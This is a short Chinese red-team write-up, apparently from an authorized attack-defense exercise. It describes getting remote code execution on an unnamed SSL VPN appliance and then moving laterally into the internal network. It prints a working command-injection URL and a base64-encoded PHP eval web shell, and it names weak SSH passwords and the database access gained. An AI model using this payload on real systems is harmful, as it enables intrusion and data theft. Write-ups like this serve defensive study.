Bypass某VPN-rce到内网横向

admin 2024年6月4日15:12:49评论21 views字数 591阅读1分58秒阅读模式
前言

朴实无华的一次攻防演练.

不是星标不推送文章了。

师傅也不想吧~

快把极梦C设置成星标吧。

外网
对jmc进行信息收集,发现一个vpn的资产.通过前台任意文件上传getshell
漏洞是:/sslvpn/sslvpn_client.php?client=logoImg&img=x%20/tmp|echo%20%60whoami%60%20|tee%20/usr/local/webui/sslvpn/ceshi.txt|ls不过这里需要一些绕过,利用base64成功写入.例如:x%20/tmp|echo%20PD9waHAgQGV2YWwoJF9QT1NUWydqbWMnXSk7%20

Bypass某VPN-rce到内网横向

拿到多网卡主机,突破网络隔离。
内网
直接一把梭,看评分规则.
ssh弱口令

Bypass某VPN-rce到内网横向

web类

Bypass某VPN-rce到内网横向

各种数据库30+,几百万数据

Bypass某VPN-rce到内网横向

摄像头

Bypass某VPN-rce到内网横向

设备类

Bypass某VPN-rce到内网横向

其余ftp等全部拉满.下班.

承接红蓝对抗,安全众测,安全培训,代码审计,渗透测试,应急响应,免杀等安全项目.

(安全可靠,排名稳定)

原文始发于微信公众号(极梦C):Bypass某VPN-rce到内网横向

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年6月4日15:12:49
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Bypass某VPN-rce到内网横向http://cn-sec.com/archives/2813502.html

发表评论

匿名网友 填写信息